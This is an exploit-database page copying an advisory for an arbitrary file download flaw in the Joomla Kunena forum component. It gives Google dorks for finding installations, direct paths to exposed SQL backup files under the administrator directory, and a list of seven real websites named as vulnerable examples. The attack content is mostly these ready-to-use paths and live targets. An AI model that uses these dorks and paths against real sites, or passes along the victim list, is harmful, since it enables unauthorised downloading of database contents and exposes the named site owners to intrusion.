Advertisement






Joomla com_kunena Components Database Backup Arbitrary File Download Vulnerability

CVE Category Price Severity
CVE-2020-23990 CWE-264 Not disclosed High
Author Risk Exploitation Type Date
Morgan James Critical Remote 2018-11-23
CVSS EPSS EPSSP
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018110196

Below is a copy:

Joomla com_kunena Components Database Backup Arbitrary File Download Vulnerability
#################################################################################################

# Exploit Title : Joomla com_kunena Components Database Backup Arbitrary File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/11/2018
# Vendor Homepage : extensions.joomla.org/extension/kunena/ ~ kunena.org/download
# Tested On : Windows and Linux
# Category : WebApps
# Price : 10,00 Euro
# Version : Kunena 1.0 and 1.5 ~ 5.1.1 / 3.8
# Software Purchase and Download Link : 
kunena.org/download/plugins/product/powered-by-remover
kunena.org/download/templates/product/blue-eagle-5
# Google Dorks : 
inurl:''/administrator/components/com_kunena/install/sql/''
inurl:''/index.php?option=com_kunena''
inurl:''/index.php?option=com_kunena&view=topic&catid=''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path : 

/administrator/

# Exploit : 

/administrator/components/com_kunena/install/sql/migrate/mysql/fireboard.sql

/administrator/components/com_kunena/install/sql/migrate/mysql/joomlaboard.sql

/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] bedrijfstaalcursussen.com/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

[+] abdillikoyu.com/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

[+] werkenmetdbcs.nza.nl/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

[+] djconstrucao.com.br/apagar/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

[+] vir.nw.ru/test/vir.nw/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

[+] xerte.org.uk/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

[+] bargainbusinessbuyers.co.uk/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.